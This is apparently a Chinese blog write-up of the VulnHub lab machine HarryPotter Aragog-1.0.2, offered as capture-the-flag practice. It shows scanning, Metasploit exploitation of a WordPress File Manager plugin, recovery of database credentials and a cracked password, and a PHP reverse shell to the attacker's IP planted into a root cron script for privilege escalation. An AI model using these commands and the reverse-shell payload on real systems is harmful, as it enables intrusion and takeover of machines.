HarryPotter第一部—Aragog-1.0.2

最新推荐文章于 2024-05-21 16:28:23 发布
最新推荐文章于 2024-05-21 16:28:23 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: vulnhub靶机通关 文章标签: 安全 ssh web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122474980
版权

Aragog 是 3 HarryPotter VM 系列中的第一个 VM,您需要在其中找到隐藏在机器内的 2 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。

信息收集

nmap扫描

nmap -sC -sV 192.168.210.148
在这里插入图片描述

IP地址靶机登录界面已经给出 根据扫描结果可得22ssh ,80http

网站信息收集

只有一张图片
在这里插入图片描述

爆破一下网站目录

dirb http://192.168.210.148
在这里插入图片描述

爆出来一个blog
在这里插入图片描述

页面有点奇怪,点击页面都会错误,推测需要域名解析,去/etc/hosts中写一下域名解析
在这里插入图片描述

在这里插入图片描述

哎,这就好了嘛
在这里插入图片描述

既然cms为wordpress那么必须得用wpscan跑一跑
直接扫没扫出什么有效信息,版本没有问题那可能插件有漏洞(noitce中提示),尝试wpscan注册账号,带上 api-token 跑一跑

注册wpscan一个账号 https://wpvulndb.com/users/sign_up

wpscan --api-token=免费版的就行 --url=http://192.168.210.148/blog -e p --plugins-detection aggressive
在这里插入图片描述

扫出3个问题,全是File Manager的漏洞
在这里插入图片描述

漏洞利用

msf getshell

msf检索漏洞exp
在这里插入图片描述

调试好参数

search wordpress File Manager
use 1
set rhosts wordpress.aragog.hogwarts
set targeturi /blog
set lhost 192.168.210.40
run

在这里插入图片描述

在这里插入图片描述

在/etc/wordpress/config-default.php 中发现了数据库的用户名密码
在这里插入图片描述

python调bash
python3 -c 'import pty; pty.spawn("/bin/bash");'

登录mysql数据库

查询数据库信息
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

得到用户hagrid98 P P PBYdTic1NGSb8hJbpVEMiJaAiNJDHtc.
界面后可得 密码为password123
在这里插入图片描述

ssh登录

成功拿到第一个魂器
在这里插入图片描述

提权

在/opt下发现一个隐藏脚本,可以拷贝文件
在这里插入图片描述

在tmp下创建php反弹shell马

<?php $sock=fsockopen("192.168.210.40",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

?>

在这里插入图片描述

将脚本添加两行
在这里插入图片描述

kali建通端口,等待不超过1分钟
成功获得root权限
在这里插入图片描述

家目录下拿到第二个魂器
在这里插入图片描述

能弹shell的原因是root有一个计划任务
在这里插入图片描述

Forest深林
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Harry Potter Wallpapers and New Tab-crx插件
04-02
语言:Bahasa Indonesia,Bahasa Melayu,Deutsch,English,Filipino,Français,Kiswahili,Nederlands,Norsk,Tiếng Việt,Türkçe,català,dansk,eesti,español,hrvatski,italiano,latviešu,lietuvių,magyar,polski...
【Vulnhub】之Aragog-1.0.2
zg_111的博客
04-11 691
wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码。所以我们到目录/tmp下写一个反弹shell的php脚本,然后修改.backup.sh脚本内容。浏览了下页面,发现没有可利用的点,但是我们能发现这个站点是利用wordpress搭建的。继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh。等待片刻,成功获取到root权限,并在root目录下发现了。
【Vulnhub靶机】HarryPotter-Aragog-1.0.2 漏洞复现
weixin_65900584的博客
02-26 1236
学习如何对 靶机 HarryPotter-Aragog-1.0.2 进行提权
【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
Demo不是emo的博客
09-30 3111
​ 今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍 ​
VulnHub_HarryPotter:Aragog (1.0.2)靶机
学术渣渣的博客
08-01 1333
靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列,这个系列有三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来! 首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。 渗透过程 从VlunHub上下载靶机,在virtualbox上打开,设置网络为桥接。 打开
【VulnHub靶场】——HARRYPOTTER第一部- ARAGOG (1.0.2)
qq_53058639的博客
01-23 918
作者名:Demo不是emo主页面链接: ****创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程,学习方法,总结的经验等等,希望能帮助到大家座右铭:不要让时代的悲哀成为你的悲哀专研方向:网络安全,数据结构每日emo:人们感到委屈的时候通常就说睡了!今天的博客内容是教程(),靶场环境来源于,该网站有很多虚拟机靶场,在这,推荐大家使用,大家进去直接搜索就能下载今天的靶场了,
vulnhub之 HarryPotter: Aragog (1.0.2)
qwweggfe的博客
08-30 331
靶机ip;192.168.181.145 kali ip: 192.168.181.129 首先进行ip扫描 打开网页进行查看 查看开启哪些端口 nmap -sC -sV 192.168.181.145 --min-rate=2000 -d 对目录进行扫描 打开/blog页面 发现notice无法进行跳转,修改/etc/hosts文件 然后在kali打开 ...
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
DdddddXxxxx的博客
05-06 1168
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
vulnhub_HARRYPOTTER: ARAGOG (1.0.2)
qq_45434762的博客
06-13 4804
主机信息kali: 192.168.1.12 Momentum:192.168.1.101 信息收集通过nmap扫描目标主机发现仅开放22、80端口nmap -T4 -A -v -p- 1...
靶机ARAGOG (1.0.2)
Tswcbyy_hp的博客
07-21 415
实验环境 主机 ip 攻击机 192.168.48.128 靶机 192.168.48.136 攻击过程 信息收集 扫描网段,找到目标靶机的IP地址 详细扫描端口,发现打开了两个端口,22和80 有80端口,肯定有个网站,在浏览器打开网站 只有一个霍格瓦茨魔法学院大战图 dirb扫描网络,找到不少地址 漏洞利用 打开第一个目录blog 看到的是wordpress的blog网站 点击notice,提示说未知的host 可以看到除了主页以外,其余所有的网站都要访问这个host
Harry-Potter-Character-Relationship-Visualization
03-28
哈里·波特角色关系可视化 要查看项目,请打开“ www”文件夹。 打开文件“ index.html”... 现在该网页可见,并且可以从该主页导航到其他页面。 使用可用的单选按钮(Netork图,径向图,条形图)导航到其他页面。 ...
Harry-Potter-and-the-prototype-of-Array
05-20
哈里·波特与阵列原型 主题: [变形]( ) [草药学]( ) [魔术史]( ) [魅力]( ) [药水]( )
harry-potter-spells:哈利·波特法术清单
05-22
$ yarn add harry-potter-spells 用法 const harryPotterSpells = require ( 'harry-potter-spells' ) console . log ( harryPotterSpells . random ( ) ) // => { "name": "Crucio", "type": "curse", "effect": ...
Harry Potter Wallpapers HD New Tab Theme-crx插件
03-16
如果您是哈利·波特(Harry Potter)的忠实粉丝,那么您就不想错过这个扩展。 此扩展名将更改您的默认搜索。 隐私政策:https://coolstart.com/privacy-policy使用条款:https://coolstart.com/terms-of-use如何卸载...
hackthebox - Aragog (考点:ftp & xxe攻击 & 修改php代码提权)
冬萍子癸水
05-30 476
1 扫描 21想到ftp进去找东西,都提示了匿名可进,里面有个test文件,好直白。。 22想到可能有ssh登录 80进web信息搜集 C:\root> nmap -A 10.10.10.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:03 EDT Nmap scan report for 10.10.10.78 Host is up (0.25s latency). Not shown: 872 closed ports, 12
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7673
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
安全+大模型应用系列之RSAC的Dropzone AI的分析
si1ence的博客
05-17 398
从Dropzone AI广泛的认可度来看,国外对该思路的认可度较好,前期在国内项目验证的时候客户也非常感兴趣。但是目前国内的安全产品、安全平台较为封闭、无法像国外产品能够广泛直接对接、或许是当前制约国内的安全GPT广泛推广的一个阻碍; 安全+大模型的产品的逐渐按照多能力的安全专家(全能)的能力和价值去规划、应该是一个受客户认可的正确方向。
Nginx - 安全基线配置与操作指南
小工匠
05-19 915
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
最新发布
rolt的专栏
05-21 666
然后再针对这个画一个块内部图,然后这里再把签名拖上去
Harry Potter 英文词频统计python代码
05-26
以下是一个简单的 Python 代码,用于统计《哈利波特》(Harry Potter第一部小说中单词的出现频率。需要注意的是,这个代码只是一个基础的示例,可能需要根据具体情况进行修改和优化。 ```python # 导入所需的库 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值